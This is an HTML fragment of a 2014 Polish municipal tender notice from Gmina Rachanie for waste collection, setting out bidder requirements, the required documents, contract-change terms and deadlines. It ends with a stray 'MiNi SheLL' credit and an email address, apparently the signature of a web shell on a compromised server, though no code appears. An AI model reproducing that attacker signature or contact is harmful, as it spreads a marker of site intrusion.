<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje lub 
            będzie dysponował co najmniej:
            - 1 pojazdem przystosowanym do odbierania zmieszanych odpadów komunalnych o
               ładowności minimum 10 Mg,
            - 1 pojazdem przystosowanymi do odbierania selektywnie zebranych odpadów 
               komunalnych o ładowności minimum 3,5 Mg,
            - 1 pojazd do odbierania odpadów bez funkcji kompaktującej.      
            - bazą magazynowo - transportową w odległości nie większej niż 60 km od granicy
              Gminy Rachanie      
           Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
           podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
      zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
      zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Formularz ofertowy - ( załącznik Nr 1 do SIWZ ) ,
      2.  	Wykaz i zakres usług , które Wykonawca zamierza powierzyć podwykonawcom,
            którzy będą uczestniczyć w wykonywaniu zamówienia -(załącznik Nr 7  do SIWZ),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust.1 ustawy PZP przewiduje możliwość dokonania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:	

1.    Zmiany terminu przewidzianego na zakończenie usług:	
       1.1   działania siły wyższej ( np. klęska żywiołowa ), mające bezpośredni wpływ na
               terminowość wykonania robót,
       1.2   wstrzymania usług przez Zamawiającego lub z przyczyn od niego niezależnych,
       1.3   wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie usług z 
               zachowaniem wzglądów technologicznych lub bhp, 
       1.4   w przypadku wystąpienia okoliczności uniemożliwiającej realizację umowy np. 
               awaria sprzętu,       
2.    Zmiany wynagrodzenia za wykonane zamówienie:
       2.1   jeżeli nastąpi urzędowa zmiana stawki podatku VAT,
       2.2   zmiana terminów płatności, wynikające z wszelkich zmian wprowadzonych do 
               umowy, o ile nie spowoduje konieczności zapłaty odsetek lub wynagrodzenia w 
               większej kwocie Wykonawcy,
       2.3   w przypadku zmiany opłaty środowiskowej wprowadzonej przez Ministra Ochrony
               Środowiska, nie więcej niż o różnicę pomiędzy wysokością dotychczasowej opłaty a 
               nową opłatą.
3.    Inne zmiany:
       3.1   zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ 
               na realizację zamówienia,
       3.2   w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego;
                - powierzenie podwykonawcom innej części usług niż wskazana w ofercie 
                  Wykonawcy,
                - zmiana podwykonawcy na etapie realizacji robót,
       3.3   w zakresie zmiany osób, które będą wykonywać zamówienie lub będą uczestniczyć 
               w wykonywaniu zamówienia, za uprzednią zgodą Zamawiającego w przypadku:
               - śmierci, choroby lub innych zdarzeń losowych,
               - nie wywiązywania się z obowiązków wynikających z umowy, jeżeli zmiana stanie
                 się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy 
                 np. rezygnacja,
       3.4    zmiany danych adresowych , numerów konta, danych związanych z obsługą 
                administracyjno-organizacyjną umowy,
       3.5    zmiany zakresu usług przez wprowadzenie nowych posesji określonych w
                załącznikach do umowy, wynikających z potrzeb Zamawiającego,
        
4.    Określa się następujący tryb dokonywania zmian postanowień umowy:
       4.1   zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron 
               wyrażoną na piśmie, pod rygorem nieważności,
       4.2   strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do 
               udokumentowania zaistnienia okoliczności powodujących zmianę umowy,
       4.3   wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
       4.4   Zamawiający nie ma obowiązku zmiany postanowień umowy, jeżeli Wykonawca w 
               terminie 3 dni od wystąpienia okoliczności powodujących dokonanie zmiany, nie
               złoży Zamawiającemu, na piśmie, uzasadnionego i udokumentowanego wniosku o 
               dokonanie zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rachanie.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rachaniach
ul. Dolna 1, 22-640 Rachanie, pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2014 godzina 11:00, miejsce: Urząd Gminy w Rachaniach
ul. Dolna 1, 22-640 Rachanie, pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.01.2015.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com